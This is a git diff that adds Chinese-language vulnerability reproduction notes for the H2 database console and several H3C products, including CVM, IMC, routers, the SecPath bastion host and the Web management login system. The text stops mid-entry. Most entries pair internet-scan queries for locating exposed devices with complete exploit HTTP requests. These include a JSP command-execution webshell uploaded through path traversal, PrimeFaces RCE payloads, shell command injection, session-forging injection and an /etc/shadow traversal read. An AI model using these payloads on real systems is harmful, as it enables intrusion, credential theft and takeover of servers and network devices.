+# H2db console 未授权访问
+
+# 一、漏洞简介
+H2 database是一款Java内存数据库，多用于单元测试。H2 database自带一个Web管理页面，在Spirng开发中，如果我们设置如下选项，即可允许外部用户访问Web管理页面，且没有鉴权：
+
+spring.h2.console.enabled=true  
+spring.h2.console.settings.web-allow-others=true  
+利用这个管理页面，我们可以进行JNDI注入攻击，进而在目标环境下执行任意命令。
+
+# 二、影响版本
++ H2db console 
+
+# 三、资产测绘
++ hunter`web.title="H2 Console"`
++ 特征
+
+![1698938977757-5a84b3ed-9af6-4a39-9192-0a640c403137.png](./img/Wn3sGvLw1T50-kc2/1698938977757-5a84b3ed-9af6-4a39-9192-0a640c403137-807420.png)
+
+# 四、漏洞复现
+点击连接直接登陆
+
+![1698939747766-ce382cf1-fd30-4072-a243-d056254aa53c.png](./img/Wn3sGvLw1T50-kc2/1698939747766-ce382cf1-fd30-4072-a243-d056254aa53c-612815.png)
+
+![1698939773633-8e03f70c-e23b-4740-8f8e-040bd0a3bafd.png](./img/Wn3sGvLw1T50-kc2/1698939773633-8e03f70c-e23b-4740-8f8e-040bd0a3bafd-654250.png)
+
+可执行sql命令
+
+![1698939824783-9a31e347-1b96-4a4c-ada7-f5f33758d27d.png](./img/Wn3sGvLw1T50-kc2/1698939824783-9a31e347-1b96-4a4c-ada7-f5f33758d27d-400521.png)  
+
+
+
+
+> 更新: 2024-02-29 23:57:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tvx8qos5yau1kggz>
\ No newline at end of file
diff --git a/H3C-CVM-fd接口前台任意文件上传漏洞复现.md b/H3C-CVM-fd接口前台任意文件上传漏洞复现.md
new file mode 100644
index 0000000..a64812e
--- /dev/null
+++ b/H3C-CVM-fd接口前台任意文件上传漏洞复现.md
@@ -0,0 +1,39 @@
+## H3C-CVM-fd接口前台任意文件上传漏洞复现
+
+ H3C CVM /cas/fileUpload/fd 接口存在任意文件上传漏洞，未授权的攻击者可以上传任意文件，获取 webshell，控制服务器权限，读取敏感信息等。
+
+## fofa
+
+```javascript
+app="H3C-CVM"
+```
+
+## poc
+
+```javascript
+POST /cas/fileUpload/fd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.123 Safari/537.36
+Connection: close
+Content-Type: multipart/form-data; boundary=WebKitFormBoundaryMMqEBbEFHlzOcYq4
+Connection: close
+
+--WebKitFormBoundaryMMqEBbEFHlzOcYq4
+Content-Disposition: form-data; name="token"
+
+/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/a.jsp
+--WebKitFormBoundaryMMqEBbEFHlzOcYq4
+Content-Disposition: form-data; name="file"; filename="a.jsp"
+Content-Type: image/png
+
+<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+--WebKitFormBoundaryMMqEBbEFHlzOcYq4--
+```
+
+![image-20241106171738287](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061717362.png)
+
+访问文件路径
+
+```
+/cas/js/lib/buttons/a.jsp
+```
\ No newline at end of file
diff --git a/H3C-H100路由器-信息泄露漏洞.md b/H3C-H100路由器-信息泄露漏洞.md
new file mode 100644
index 0000000..0f225b5
--- /dev/null
+++ b/H3C-H100路由器-信息泄露漏洞.md
@@ -0,0 +1,27 @@
+# H3C-H100路由器-信息泄露漏洞
+
+# 一、漏洞简介
+H3C Magic H100是新华三技术有限公司特别设计的全千兆家庭智能中枢。H3C-H100路由器信息泄露漏洞,可泄露用户泄露密码
+
+# 二、影响版本
++ H3C多系列路由器
+
+# 三、资产测绘
++ fofa`body="/grwizard/h3c.ico"`
++ 登录页面![1713637393108-3b6d8d9c-19f1-4717-92a7-27c6d8d31adb.png](./img/LtjRIrDMAFrjFfcj/1713637393108-3b6d8d9c-19f1-4717-92a7-27c6d8d31adb-323113.png)
+
+# 四、漏洞复现
+```java
+/h3c/local/ssidName
+```
+
+<font style="color:rgba(0, 0, 0, 0.9);">密码就在ssidKey字段</font>
+
+![1713637470972-d19fa597-a666-4004-a47a-025f92a849b7.png](./img/LtjRIrDMAFrjFfcj/1713637470972-d19fa597-a666-4004-a47a-025f92a849b7-813780.png)
+
+![1713637498157-5d0026b7-2372-4d1b-825b-234215c5d89b.png](./img/LtjRIrDMAFrjFfcj/1713637498157-5d0026b7-2372-4d1b-825b-234215c5d89b-491262.png)
+
+
+
+> 更新: 2024-04-22 13:29:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ddar0wbuli2xp2n8>
\ No newline at end of file
diff --git a/H3C-Magic-B1STV100R012-RCE.md b/H3C-Magic-B1STV100R012-RCE.md
new file mode 100644
index 0000000..4ad7f18
--- /dev/null
+++ b/H3C-Magic-B1STV100R012-RCE.md
@@ -0,0 +1,24 @@
+## H3C Magic B1STV100R012 RCE
+```
+POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+Content-Length: 1569
+Content-Type: application/x-www-form-urlencoded
+
+pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami
+```
+
+fofa：app="H3C-Ent-Router"
+```
+POST /goform/aspForm HTTP/1.1
+Host: {{Hostname}}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)
+AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Connection: close
+Content-Length: 68
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Referer: http://{{Hostname}}/userLogin.asp
+CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1; $(ls>/www/test);
+访问 http://xxx/test
+```
diff --git a/H3C-用户自助服务平台-dynamiccontent.properties.xhtml存在RCE漏洞.md b/H3C-用户自助服务平台-dynamiccontent.properties.xhtml存在RCE漏洞.md
new file mode 100644
index 0000000..7075255
--- /dev/null
+++ b/H3C-用户自助服务平台-dynamiccontent.properties.xhtml存在RCE漏洞.md
@@ -0,0 +1,20 @@
+## H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞
+
+## fofa
+
+```
+fid="tPmVs5PL6e9m5Xt0J4V2+A=="
+```
+
+## poc
+
+```
+POST /mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
+Host: 127.0.0.1
+User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
+Content-Length: 1573
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip
+
+pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami
+```
diff --git a/H3CCVM前台任意文件上传漏洞.md b/H3CCVM前台任意文件上传漏洞.md
new file mode 100644
index 0000000..87789ea
--- /dev/null
+++ b/H3CCVM前台任意文件上传漏洞.md
@@ -0,0 +1,42 @@
+# H3C CVM 前台任意文件上传漏洞
+
+# 一、漏洞简介
+H3C公司依托其强大的技术实力、产品与服务优势，以及深入人心的以客户为中心的理念，为企业数据中心IaaS云计算基础架构提供最优化的虚拟化与云业务运营解决方案。通过H3C CAS CVM虚拟化管理系统实现数据中心虚拟化环境的中央管理控制，以简洁的管理界面，统一管理数据中心内所有的物理资源和虚拟资源，不仅能提高管理员的管控能力、简化日常例行工作，更可降低IT环境的复杂度和管理成本。H3C CVM存在任意文件上传漏洞，攻击者可以上传任意文件，获取webshell，控制服务器权限，读取敏感信息等。
+
+# 二、影响版本
++ H3C CVM
+
+## 三、资产测绘
++ hunter `app.name="H3C CAS 云服务"`
++ 特征
+
+![1699805998553-a9cd393a-f4d8-407b-a39e-9d863f2a0095.png](./img/yHLjlsks1B1hI0Ja/1699805998553-a9cd393a-f4d8-407b-a39e-9d863f2a0095-146415.png)
+
+## 四、漏洞复现
+```plain
+POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/stc.jsp&name=222 HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Range: bytes 0-10/20
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Length: 23
+
+<%out.print("99999");%>
+```
+
+![1699806057817-f90bda5b-4e38-4c2f-a7d7-d52d48f39cdf.png](./img/yHLjlsks1B1hI0Ja/1699806057817-f90bda5b-4e38-4c2f-a7d7-d52d48f39cdf-842579.png)
+
+文件上传位置，请求需携带请求头Content-Range: bytes 0-10/20
+
+```plain
+GET /cas/js/lib/buttons/stc.jsp HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Range: bytes 0-10/20
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+```
+
+![1699806074843-f8eee24b-4127-482a-8146-396e97b5d5c6.png](./img/yHLjlsks1B1hI0Ja/1699806074843-f8eee24b-4127-482a-8146-396e97b5d5c6-942461.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nwfsvgilkdhpnsd0>
\ No newline at end of file
diff --git a/H3CIMC远程命令执行漏洞.md b/H3CIMC远程命令执行漏洞.md
new file mode 100644
index 0000000..81874bd
--- /dev/null
+++ b/H3CIMC远程命令执行漏洞.md
@@ -0,0 +1,48 @@
+# H3C IMC 远程命令执行漏洞
+
+# 一、漏洞概述
+H3C IMC（Intlligent Management Center）智能管理中心是H3C推出的下一代业务智能管理产品。它融合了当前多个产品，以统一风格提供与网络相关的各类管理、控制、监控等功能；同时以开放的组件化的架构原型，向平台及其承载业务提供分布式、分级式交互管理特性；并为业务软件的下一代产品提供最可靠的、可扩展、高性能的业务平台。  
+H3C IMC dynamiccontent.properties.xhtml 存在远程命令执行，攻击者通过构造特殊的请求造成远程命令执行
+
+# 二、影响版本
+H3C IMC
+
+# 三、资产测绘
++ FOFA：`body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui"`
+
+![1689519334500-a1cf7457-ee3a-4052-8e36-53bd8df4c281.png](./img/uHodyoTTZJUrnqUk/1689519334500-a1cf7457-ee3a-4052-8e36-53bd8df4c281-334876.png)
+
++ 登陆页面：
+
+![1689519365071-67684930-e208-4ae5-a892-175f60f5b428.png](./img/uHodyoTTZJUrnqUk/1689519365071-67684930-e208-4ae5-a892-175f60f5b428-458481.png)
+
+# 四、漏洞复现
+漏洞位置：`/imc/javax.faces.resource/dynamiccontent.properties.xhtml`
+
+数据包：
+
+```plain
+POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
+Host: 127.0.0.1:9090
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=F92841E0E8B8B5862380EE8A26113638; oam.Flash.RENDERMAP.TOKEN=-2s6vgzlac
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1567
+
+cmd=whoami&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&pfdrt=sc
+```
+
+![1689519490720-6b4386a4-69b6-48a2-91f0-6702e4b260a6.png](./img/uHodyoTTZJUrnqUk/1689519490720-6b4386a4-69b6-48a2-91f0-6702e4b260a6-819474.png)
+
+# 五、整改建议
+升级IMC平台和相关组件的版本到最新，需注意适配的情况。其次可以在IMC所在的服务器的操作系统防火墙上配置出入站规则，拦截高危端口。在网络设备侧或安全设备侧通过安全策略、ACL的方式来进行拦截。条件允许的话，可考虑给服务器操作系统打补丁
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yd9izcxtofrr2q1i>
\ No newline at end of file
diff --git a/H3CSecPath堡垒机data_provider.php远程命令执行漏洞.md b/H3CSecPath堡垒机data_provider.php远程命令执行漏洞.md
new file mode 100644
index 0000000..8741bf0
--- /dev/null
+++ b/H3CSecPath堡垒机data_provider.php远程命令执行漏洞.md
@@ -0,0 +1,57 @@
+# H3C SecPath堡垒机 data_provider.php 远程命令执行漏洞
+
+# 一、漏洞简介
+H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞，攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令。
+
+# 二、影响版本
++ H3C SecParh堡垒机
+
+# 三、资产测绘
++ fofaapp="H3C-SecPath-运维审计系统" && body="2018"
++ 登录页面
+
+![1692631905675-9287b478-0c9a-4758-9f18-3849248ffff0.png](./img/4J1iVrH3VLVHqVI0/1692631905675-9287b478-0c9a-4758-9f18-3849248ffff0-489477.png)
+
+# 四、漏洞复现
+1. 通过POC设置cookie
+
+```plain
+GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1
+Host: xx.xx.xx.xx
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Cookie: PHPSESSID=grlcbpjqpu59r6aanqjsn2gao0
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
+```
+
+![1692666828015-6ad374fa-5e3e-4c1e-8de3-c5a44fc0b990.png](./img/4J1iVrH3VLVHqVI0/1692666828015-6ad374fa-5e3e-4c1e-8de3-c5a44fc0b990-478316.png)
+
+2. 通过设置的cookie执行命令
+
+```plain
+GET /audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(pwd)&identity_cond=&query_type=all&format=json&browse=true HTTP/1.1
+Host: xx.xx.xx.xx
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Cookie: PHPSESSID=grlcbpjqpu59r6aanqjsn2gao0
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
+```
+
+![1692666807243-fc8aac1a-67f8-44d5-b0d9-80034077e89d.png](./img/4J1iVrH3VLVHqVI0/1692666807243-fc8aac1a-67f8-44d5-b0d9-80034077e89d-819281.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/znczuitp8ey961eg>
\ No newline at end of file
diff --git a/H3CWeb网管登录系统aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md b/H3CWeb网管登录系统aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md
new file mode 100644
index 0000000..b49d85d
--- /dev/null
+++ b/H3CWeb网管登录系统aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md
@@ -0,0 +1,41 @@
+# H3CWeb网管登录系统aaa_portal_auth_wchat_submit存在远程命令执行漏洞
+
+# 一、漏洞简介
+H3CWeb网管登录系统aaa_portal_auth_wchat_submit存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ H3C用户网管登录系统
+
+# 三、资产测绘
++ hunter`app.name=="H3C Web 网管"`
++ 特征
+
+![1701757610344-1df9adee-96b0-44a3-b3fe-1dd053b0ebd2.png](./img/-wD-0hxEiTfW9UpW/1701757610344-1df9adee-96b0-44a3-b3fe-1dd053b0ebd2-819639.png)
+
+# 四、漏洞复现
+```plain
+GET /webui/?g=aaa_portal_auth_wchat_submit&suffix=;echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/stc.txt|ls HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: {hostname}
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1703406198887-d7773622-0e8c-4f94-874c-d8705e0decea.png](./img/-wD-0hxEiTfW9UpW/1703406198887-d7773622-0e8c-4f94-874c-d8705e0decea-740943.png)
+
+获取命令执行结果
+
+```plain
+GET /sslvpn/stc.txt HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: {hostname}
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1703406215229-b92a5c74-1367-432b-a589-3e637bbe1e0c.png](./img/-wD-0hxEiTfW9UpW/1703406215229-b92a5c74-1367-432b-a589-3e637bbe1e0c-482105.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ao87h8f27dwwuuvo>
\ No newline at end of file
diff --git a/H3CWeb网管登录系统jQuery-1.7.2存在任意文件读取.md b/H3CWeb网管登录系统jQuery-1.7.2存在任意文件读取.md
new file mode 100644
index 0000000..cc72ffc
--- /dev/null
+++ b/H3CWeb网管登录系统jQuery-1.7.2存在任意文件读取.md
@@ -0,0 +1,33 @@
+# H3C Web网管登录系统jQuery-1.7.2存在任意文件读取
+
+# <font style="color:rgb(0, 0, 0);">一、漏洞简介</font>
+H3C Web网管登录系统jQuery-1.7.2存在任意文件读取漏洞，其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞，攻击者可通过前台读取任意文件。
+
+## <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ <font style="color:rgb(0, 0, 0);">H3C用户网管登录系统</font>
+
+# <font style="color:rgb(0, 0, 0);">三、资产测绘</font>
++ <font style="color:rgb(0, 0, 0);">hunter</font>`web.body="webui/js/jquerylib/jquery-1.7.2.min.js"`
++ <font style="color:rgb(0, 0, 0);">特征</font>
+
+![1699976084811-ac173385-4963-406a-ba41-d03251a1c453.png](./img/TwNVOLVx89ZNCJov/1699976084811-ac173385-4963-406a-ba41-d03251a1c453-175462.png)
+
+# <font style="color:rgb(0, 0, 0);">四、漏洞复现</font>
+```plain
+  GET /webui/?g=sys_dia_data_down&file_name=../../../../../etc/shadow HTTP/1.1
+  Host: xx.xx.xx.xx
+  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+  Accept-Encoding: gzip, deflate
+  Connection: close
+  Cookie: USGSESSID=a9523e6ede287f558817c3bbcf9a60be
+  Upgrade-Insecure-Requests: 1
+```
+
+![1694660996937-199bec25-d529-4f3a-aa85-d888280b1627.png](./img/TwNVOLVx89ZNCJov/1694660996937-199bec25-d529-4f3a-aa85-d888280b1627-831084.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/spgv7orsuvd67clb>
\ No newline at end of file
diff --git a/H3CWeb网管登录系统sslvpn_client存在命令执行漏洞.md b/H3CWeb网管登录系统sslvpn_client存在命令执行漏洞.md
new file mode 100644
index 0000000..4a4271e
--- /dev/null
+++ b/H3CWeb网管登录系统sslvpn_client存在命令执行漏洞.md
@@ -0,0 +1,41 @@
+# H3CWeb网管登录系统sslvpn_client存在命令执行漏洞
+
+# 一、漏洞简介
+H3C用户网管登录系统sslvpn_client存在命令执行漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ H3C用户网管登录系统
+
+# 三、资产测绘
++ hunter`app.name=="H3C Web 网管"`
++ 特征
+
+![1701757610344-1df9adee-96b0-44a3-b3fe-1dd053b0ebd2.png](./img/9iCDf0Y97piuySfp/1701757610344-1df9adee-96b0-44a3-b3fe-1dd053b0ebd2-032911.png)
+
+# 四、漏洞复现
+```java
